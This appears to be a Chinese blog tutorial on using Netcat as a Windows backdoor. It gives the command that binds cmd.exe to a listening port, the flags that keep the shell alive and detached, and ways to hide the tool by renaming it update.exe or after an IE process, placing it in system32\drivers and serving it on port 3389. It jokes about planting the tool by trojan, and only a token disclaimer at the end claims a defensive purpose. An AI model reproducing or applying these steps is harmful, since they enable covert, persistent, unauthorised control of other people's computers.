一:简介
瑞士×××大家都知道,但是Netcat被誉为网络安全界的‘瑞士×××',这个相信有不少朋友也都知晓~~一个可以透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
能够直接由其它程序和脚本轻松驱动。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑'编译 后的新‘浓缩'版。
二:安装
我今天主要说的是在windows下的安装,其实很简单,下载后的文件中的nc.exe拷贝到c:\windows下
当然这安装的是个后门,也就是你要攻击的机器,所以这里就看你的了,不管是通过木马也好,还是你一棒把某网络管理员打晕之后种到其C盘下~~~哈哈,这本钱可是下的够大啊。
三:使用
1.查看被攻击机的IP地址和攻击机的IP地址
2.在被攻击主机中使用
在被攻击主机中运行nc.exe –l –p 4455 –e cmd.exe (在被攻击中主机中开启4455端口,将4455端口映射到cmd.exe程序中。)
攻击者可以进行访问了。。。注意端口我们映射的是4455
跟我们正常链接一样,进去了。。
可是如果被攻击者有查看端口进程的习惯你是不是傻了?来看
有192.168.0.18通过4455使用TCP连进了。。。
这样也有个弊端,就是你访问之后不能随便切断链接,这样的话就连不上去了。。。只要你退出,被攻击主机也会随之退出
3.保持攻击链接的持续性
其实在我前面给出命令nc.exe –l –p 4455 –e cmd.exe中的“-l”变为大写的“-L”虽然windows不区分大小写,但是这个工具本身是区分大小写的。
这样的话,我在来测试一次,看攻击者退出后,被攻击主机是否会断开连接
对比上面的图和这张图,是否发现,如果不是大写的L那么它是会跳出登录的,直接返回到C盘,而这里使用大写L后没有跳出(L就是代表可持续性)
4.被攻击主机隐藏攻击终端
假如被攻击者现在回到了自己的机器旁边,并且进入了电脑,他是不是会很纳闷?怎么多出一个终端来?
而这时候他把这个一关,你是不是不能继续控制了?
也不是,俗话说滴好,道高一尺魔高一丈,我们运行nc.exe –L –d –p 4455 –e cdm.exe 【-d保持在关闭cmd终端后,保持连接】
登录被攻击主机
这个时候我把被攻击机器的终端关闭了~~看看是否见效
毫无问题,可以继续保持连接,到了这个时候你欺骗一些没有电脑常识的人基本够用了。。。但是如果是有些常识的人呢?在查看进程数时候看到了一个未知进程我们一般直接Cut是吧?那么这个进程会不会存在与进程中呢?
看见了吧?嘿嘿,是不是也不好过关呢?
5.隐藏攻击程序名称,改成常见的系统程序
我把nc.exe攻击程序移动到c:\windows\system32\drivers\ 并且起个名字叫update.exe,是不有点迷惑性了。
命令没有变,只不过是路径稍有变化。
进程中没有了nc.exe程序,变成了update.exe
看看效果吧,200%可以正常登录
6.伪装端口为常见端口80、3389
伪装用在这是在贴切不过了,大家也有同感吧?也是hack一贯做法
我在c:\windows\system32\drivers\建立了一个文件夹并且重命名为export,这时候需要c:\windows\下有一个nc.exe攻击程序。。。意思大家大概已经知道了,就是要把c:\windows\nc.exe移动到c:\windows\system32\drivers\export下,然后运行,为了保险我把攻击程序的名字也给替换掉了,改成了IE的正常进程。
我先试了下80口,由于我机器已经有了80口在运行,我只好用3389了,幸好早有预测呐
回车之后
通过3389进入192.168.0.111(被攻击主机后,进行查看信息)
我们在看看进程,是否有IE的进程
Netcat功能确实很强大,还有许多我们有列举出来,放在安全架构中主要是为了教给大家hack是如何攻击的,我们如何采取防范。切勿去###嘿嘿,首先声明,本人只是教了这个防范措施,干了坏事后于本人无关。。。